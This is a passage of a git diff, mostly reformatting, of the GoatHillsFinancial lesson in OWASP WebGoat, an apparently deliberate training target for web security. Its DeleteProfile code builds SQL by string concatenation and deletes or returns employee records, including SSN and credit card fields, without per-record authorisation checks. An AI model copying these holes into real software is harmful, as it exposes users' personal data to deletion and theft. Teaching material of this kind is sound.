-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		statement.executeUpdate(query);
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error deleting employee profile");
-		sqle.printStackTrace();
-	    }
+		getLesson().setCurrentAction(s, getActionName());
+
+		int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
+		int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
+
+		if (isAuthenticated(s))
+		{
+			deleteEmployeeProfile(s, userId, employeeId);
+
+			try
+			{
+				chainedAction.handleRequest(s);
+			} catch (UnauthenticatedException ue1)
+			{
+				System.out.println("Internal server error");
+				ue1.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				System.out.println("Internal server error");
+				ue2.printStackTrace();
+			}
+		}
+		else
+			throw new UnauthenticatedException();
+
 	}
-	catch (Exception e)
+
+	public String getNextPage(WebSession s)
 	{
-	    s.setMessage("Error deleting employee profile");
-	    e.printStackTrace();
+		return GoatHillsFinancial.LISTSTAFF_ACTION;
+	}
+
+	public void deleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException
+	{
+		try
+		{
+			// Note: The password field is ONLY set by ChangePassword
+			String query = "DELETE FROM employee WHERE userid = " + employeeId;
+			// System.out.println("Query: " + query);
+			try
+			{
+				Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																					ResultSet.CONCUR_READ_ONLY);
+				statement.executeUpdate(query);
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error deleting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error deleting employee profile");
+			e.printStackTrace();
+		}
 	}
-    }
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
index 287799439..618f120a3 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
@@ -1,132 +1,115 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
-
 import org.owasp.webgoat.session.Employee;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class EditProfile extends DefaultLessonAction
 {
 
-    public EditProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	if (isAuthenticated(s))
+	public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
-	    int userId = getUserId(s);
-	    int employeeId = s.getParser().getIntParameter(
-		    GoatHillsFinancial.EMPLOYEE_ID);
-
-	    Employee employee = getEmployeeProfile(s, userId, employeeId);
-	    setSessionAttribute(s, getLessonName() + "."
-		    + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		super(lesson, lessonName, actionName);
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-    public String getNextPage(WebSession s)
-    {
-	return GoatHillsFinancial.EDITPROFILE_ACTION;
-    }
-
-    public Employee getEmployeeProfile(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException
 	{
-	    String query = "SELECT * FROM employee WHERE userid = ?";
+		getLesson().setCurrentAction(s, getActionName());
 
-	    try
-	    {
-		PreparedStatement answer_statement = WebSession
-			.getConnection(s).prepareStatement(query,
-				ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		answer_statement.setInt(1, subjectUserId);
-		ResultSet answer_results = answer_statement.executeQuery();
-		if (answer_results.next())
+		if (isAuthenticated(s))
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
+			int userId = getUserId(s);
+			int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
+
+			Employee employee = getEmployeeProfile(s, userId, employeeId);
+			setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		}
+		else
+			throw new UnauthenticatedException();
 	}
 
-	return profile;
-    }
+	public String getNextPage(WebSession s)
+	{
+		return GoatHillsFinancial.EDITPROFILE_ACTION;
+	}
+
+	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
+		{
+			String query = "SELECT * FROM employee WHERE userid = ?";
+
+			try
+			{
+				PreparedStatement answer_statement = WebSession.getConnection(s)
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				answer_statement.setInt(1, subjectUserId);
+				ResultSet answer_results = answer_statement.executeQuery();
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
index e8cd6c8c4..5adb844eb 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
-
 import org.owasp.webgoat.session.Employee;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
@@ -11,180 +11,151 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class FindProfile extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public FindProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName, LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException,
-	    ValidationException
-    {
-	if (isAuthenticated(s))
+	public FindProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + GoatHillsFinancial.USER_ID);
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
+	}
 
-	    String pattern = s.getParser().getRawParameter(
-		    GoatHillsFinancial.SEARCHNAME);
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
+	{
+		if (isAuthenticated(s))
+		{
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
 
-	    findEmployeeProfile(s, userId, pattern);
+			String pattern = s.getParser().getRawParameter(GoatHillsFinancial.SEARCHNAME);
 
-	    // Execute the chained Action if the employee was found.
-	    if (foundEmployee(s))
-	    {
+			findEmployeeProfile(s, userId, pattern);
+
+			// Execute the chained Action if the employee was found.
+			if (foundEmployee(s))
+			{
+				try
+				{
+					chainedAction.handleRequest(s);
+				} catch (UnauthenticatedException ue1)
+				{
+					System.out.println("Internal server error");
+					ue1.printStackTrace();
+				} catch (UnauthorizedException ue2)
+				{
+					System.out.println("Internal server error");
+					ue2.printStackTrace();
+				}
+			}
+		}
+		else
+			throw new UnauthenticatedException();
+	}
+
+	public String getNextPage(WebSession s)
+	{
+		String page = GoatHillsFinancial.SEARCHSTAFF_ACTION;
+
+		if (foundEmployee(s)) page = GoatHillsFinancial.VIEWPROFILE_ACTION;
+
+		return page;
+	}
+
+	private boolean foundEmployee(WebSession s)
+	{
+		boolean found = false;
 		try
 		{
-		    chainedAction.handleRequest(s);
-		}
-		catch (UnauthenticatedException ue1)
+			getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID);
+			found = true;
+		} catch (ParameterNotFoundException e)
 		{
-		    System.out.println("Internal server error");
-		    ue1.printStackTrace();
 		}
-		catch (UnauthorizedException ue2)
+
+		return found;
+	}
+
+	public Employee findEmployeeProfile(WebSession s, int userId, String pattern) throws UnauthorizedException
+	{
+		Employee profile = null;
+		// Clear any residual employee id's in the session now.
+		removeSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID);
+
+		// Query the database for the profile data of the given employee
+		try
 		{
-		    System.out.println("Internal server error");
-		    ue2.printStackTrace();
-		}
-	    }
-	}
-	else
-	    throw new UnauthenticatedException();
-    }
+			String query = "SELECT * FROM employee WHERE first_name LIKE ? OR last_name LIKE ?";
 
+			try
+			{
+				PreparedStatement answer_statement = WebSession.getConnection(s)
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				answer_statement.setString(1, "%" + pattern + "%");
+				answer_statement.setString(2, "%" + pattern + "%");
+				ResultSet answer_results = answer_statement.executeQuery();
 
-    public String getNextPage(WebSession s)
-    {
-	String page = GoatHillsFinancial.SEARCHSTAFF_ACTION;
+				// Just use the first hit.
+				if (answer_results.next())
+				{
+					int id = answer_results.getInt("userid");
+					// Note: Do NOT get the password field.
+					profile = new Employee(id, answer_results.getString("first_name"), answer_results
+							.getString("last_name"), answer_results.getString("ssn"),
+							answer_results.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 
-	if (foundEmployee(s))
-	    page = GoatHillsFinancial.VIEWPROFILE_ACTION;
-
-	return page;
-    }
-
-
-    private boolean foundEmployee(WebSession s)
-    {
-	boolean found = false;
-	try
-	{
-	    getIntRequestAttribute(s, getLessonName() + "."
-		    + GoatHillsFinancial.EMPLOYEE_ID);
-	    found = true;
-	}
-	catch (ParameterNotFoundException e)
-	{}
-
-	return found;
-    }
-
-
-    public Employee findEmployeeProfile(WebSession s, int userId, String pattern)
-	    throws UnauthorizedException
-    {
-	Employee profile = null;
-	// Clear any residual employee id's in the session now.
-	removeSessionAttribute(s, getLessonName() + "."
-		+ GoatHillsFinancial.EMPLOYEE_ID);
-
-	// Query the database for the profile data of the given employee
-	try
-	{
-	    String query = "SELECT * FROM employee WHERE first_name LIKE ? OR last_name LIKE ?";
-
-	    try
-	    {
-		PreparedStatement answer_statement = WebSession
-			.getConnection(s).prepareStatement(query,
-				ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		answer_statement.setString(1, "%" + pattern + "%");
-		answer_statement.setString(2, "%" + pattern + "%");
-		ResultSet answer_results = answer_statement.executeQuery();
-
-		// Just use the first hit.
-		if (answer_results.next())
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */
+					setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer.toString(id));
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error finding employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
 		{
-		    int id = answer_results.getInt("userid");
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(id, answer_results
-			    .getString("first_name"), answer_results
-			    .getString("last_name"), answer_results
-			    .getString("ssn"), answer_results
-			    .getString("title"), answer_results
-			    .getString("phone"), answer_results
-			    .getString("address1"), answer_results
-			    .getString("address2"), answer_results
-			    .getInt("manager"), answer_results
-			    .getString("start_date"), answer_results
-			    .getInt("salary"), answer_results.getString("ccn"),
-			    answer_results.getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */
-		    setRequestAttribute(s, getLessonName() + "."
-			    + GoatHillsFinancial.EMPLOYEE_ID, Integer
-			    .toString(id));
+			s.setMessage("Error finding employee profile");
+			e.printStackTrace();
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error finding employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error finding employee profile");
-	    e.printStackTrace();
-	}
 
-	return profile;
-    }
+		return profile;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
index 44ba5f481..43ad810e4 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import java.util.ArrayList;
 import java.util.Hashtable;
 import java.util.List;
 import java.util.Map;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -16,317 +16,312 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class GoatHillsFinancial extends RandomLessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-    public final static String DESCRIPTION = "description";
+	public final static String DESCRIPTION = "description";
 
-    public final static String DISCIPLINARY_DATE = "disciplinaryDate";
+	public final static String DISCIPLINARY_DATE = "disciplinaryDate";
 
-    public final static String DISCIPLINARY_NOTES = "disciplinaryNotes";
+	public final static String DISCIPLINARY_NOTES = "disciplinaryNotes";
 
-    public final static String CCN_LIMIT = "ccnLimit";
+	public final static String CCN_LIMIT = "ccnLimit";
 
-    public final static String CCN = "ccn";
+	public final static String CCN = "ccn";
 
-    public final static String SALARY = "salary";
+	public final static String SALARY = "salary";
 
-    public final static String START_DATE = "startDate";
+	public final static String START_DATE = "startDate";
 
-    public final static String MANAGER = "manager";
+	public final static String MANAGER = "manager";
 
-    public final static String ADDRESS1 = "address1";
+	public final static String ADDRESS1 = "address1";
 
-    public final static String ADDRESS2 = "address2";
+	public final static String ADDRESS2 = "address2";
 
-    public final static String PHONE_NUMBER = "phoneNumber";
+	public final static String PHONE_NUMBER = "phoneNumber";
 
-    public final static String TITLE = "title";
+	public final static String TITLE = "title";
 
-    public final static String SSN = "ssn";
+	public final static String SSN = "ssn";
 
-    public final static String LAST_NAME = "lastName";
+	public final static String LAST_NAME = "lastName";
 
-    public final static String FIRST_NAME = "firstName";
+	public final static String FIRST_NAME = "firstName";
 
-    public final static String PASSWORD = "password";
+	public final static String PASSWORD = "password";
 
-    public final static String EMPLOYEE_ID = "employee_id";
+	public final static String EMPLOYEE_ID = "employee_id";
 
-    public final static String USER_ID = "user_id";
+	public final static String USER_ID = "user_id";
 
-    public final static String SEARCHNAME = "search_name";
+	public final static String SEARCHNAME = "search_name";
 
-    public final static String SEARCHRESULT_ATTRIBUTE_KEY = "SearchResult";
+	public final static String SEARCHRESULT_ATTRIBUTE_KEY = "SearchResult";
 
-    public final static String EMPLOYEE_ATTRIBUTE_KEY = "Employee";
+	public final static String EMPLOYEE_ATTRIBUTE_KEY = "Employee";
 
-    public final static String STAFF_ATTRIBUTE_KEY = "Staff";
+	public final static String STAFF_ATTRIBUTE_KEY = "Staff";
 
-    public final static String LOGIN_ACTION = "Login";
+	public final static String LOGIN_ACTION = "Login";
 
-    public final static String LOGOUT_ACTION = "Logout";
+	public final static String LOGOUT_ACTION = "Logout";
 
-    public final static String LISTSTAFF_ACTION = "ListStaff";
+	public final static String LISTSTAFF_ACTION = "ListStaff";
 
-    public final static String SEARCHSTAFF_ACTION = "SearchStaff";
+	public final static String SEARCHSTAFF_ACTION = "SearchStaff";
 
-    public final static String FINDPROFILE_ACTION = "FindProfile";
+	public final static String FINDPROFILE_ACTION = "FindProfile";
 
-    public final static String VIEWPROFILE_ACTION = "ViewProfile";
+	public final static String VIEWPROFILE_ACTION = "ViewProfile";
 
-    public final static String EDITPROFILE_ACTION = "EditProfile";
+	public final static String EDITPROFILE_ACTION = "EditProfile";
 
-    public final static String UPDATEPROFILE_ACTION = "UpdateProfile";
+	public final static String UPDATEPROFILE_ACTION = "UpdateProfile";
 
-    public final static String CREATEPROFILE_ACTION = "CreateProfile";
+	public final static String CREATEPROFILE_ACTION = "CreateProfile";
 
-    public final static String DELETEPROFILE_ACTION = "DeleteProfile";
+	public final static String DELETEPROFILE_ACTION = "DeleteProfile";
 
-    public final static String ERROR_ACTION = "error";
+	public final static String ERROR_ACTION = "error";
 
-    private final static Integer DEFAULT_RANKING = new Integer(125);
+	private final static Integer DEFAULT_RANKING = new Integer(125);
 
-    private Map<String, LessonAction> lessonFunctions = new Hashtable<String, LessonAction>();
+	private Map<String, LessonAction> lessonFunctions = new Hashtable<String, LessonAction>();
 
-    public GoatHillsFinancial()
-    {
-	String myClassName = parseClassName(this.getClass().getName());
-	registerActions(myClassName);
-    }
-
-    protected void registerActions(String className) {
-    	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-    	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-    	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-    	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-    	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
-
-    	// These actions are special in that they chain to other actions.
-    	registerAction(new Login(this, className, LOGIN_ACTION,
-    		getAction(LISTSTAFF_ACTION)));
-    	registerAction(new Logout(this, className, LOGOUT_ACTION,
-    		getAction(LOGIN_ACTION)));
-    	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
-    		getAction(VIEWPROFILE_ACTION)));
-    	registerAction(new UpdateProfile(this, className,
-    		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-    	registerAction(new DeleteProfile(this, className,
-    		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
-    
-    protected final String parseClassName(String fqcn)
-    {
-	String className = fqcn;
-
-	int lastDotIndex = fqcn.lastIndexOf('.');
-	if (lastDotIndex > -1)
-	    className = fqcn.substring(lastDotIndex + 1);
-
-	return className;
-    }
-
-    protected void registerAction(LessonAction action)
-    {
-	lessonFunctions.put(action.getActionName(), action);
-    }
-
-    public String[] getStages() {
-    	return new String[] {};
-    }
-    
-    protected List<String> getHints(WebSession s)
-    {
-	return new ArrayList<String>();
-    }
-
-    public String getInstructions(WebSession s)
-    {
-	return "";
-    }
-
-    protected LessonAction getAction(String actionName)
-    {
-	return lessonFunctions.get(actionName);
-    }
-
-    public void handleRequest(WebSession s)
-    {
-	if (s.getLessonSession(this) == null)
-	    s.openLessonSession(this);
-
-	String requestedActionName = null;
-	try
+	public GoatHillsFinancial()
 	{
-	    requestedActionName = s.getParser().getStringParameter("action");
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    // Let them eat login page.
-	    requestedActionName = LOGIN_ACTION;
+		String myClassName = parseClassName(this.getClass().getName());
+		registerActions(myClassName);
 	}
 
-	try
+	protected void registerActions(String className)
 	{
-	    LessonAction action = getAction(requestedActionName);
-	    if (action == null)
-	    {
+		registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+		registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+		registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+		// These actions are special in that they chain to other actions.
+		registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
+		registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
+		registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
+	}
+
+	protected final String parseClassName(String fqcn)
+	{
+		String className = fqcn;
+
+		int lastDotIndex = fqcn.lastIndexOf('.');
+		if (lastDotIndex > -1) className = fqcn.substring(lastDotIndex + 1);
+
+		return className;
+	}
+
+	protected void registerAction(LessonAction action)
+	{
+		lessonFunctions.put(action.getActionName(), action);
+	}
+
+	public String[] getStages()
+	{
+		return new String[] {};
+	}
+
+	protected List<String> getHints(WebSession s)
+	{
+		return new ArrayList<String>();
+	}
+
+	public String getInstructions(WebSession s)
+	{
+		return "";
+	}
+
+	protected LessonAction getAction(String actionName)
+	{
+		return lessonFunctions.get(actionName);
+	}
+
+	public void handleRequest(WebSession s)
+	{
+		if (s.getLessonSession(this) == null) s.openLessonSession(this);
+
+		String requestedActionName = null;
+		try
+		{
+			requestedActionName = s.getParser().getStringParameter("action");
+		} catch (ParameterNotFoundException pnfe)
+		{
+			// Let them eat login page.
+			requestedActionName = LOGIN_ACTION;
+		}
+
+		try
+		{
+			LessonAction action = getAction(requestedActionName);
+			if (action == null)
+			{
+				setCurrentAction(s, ERROR_ACTION);
+			}
+			else
+			{
+				// System.out.println("GoatHillsFinancial.handleRequest() dispatching to: " +
+				// action.getActionName());
+				if (action.requiresAuthentication())
+				{
+					if (action.isAuthenticated(s))
+					{
+						action.handleRequest(s);
+					}
+					else
+						throw new UnauthenticatedException();
+				}
+				else
+				{
+					// Access to Login does not require authentication.
+					action.handleRequest(s);
+				}
+			}
+		} catch (ParameterNotFoundException pnfe)
+		{
+			System.out.println("Missing parameter");
+			pnfe.printStackTrace();
 			setCurrentAction(s, ERROR_ACTION);
-	    } else
-	    {
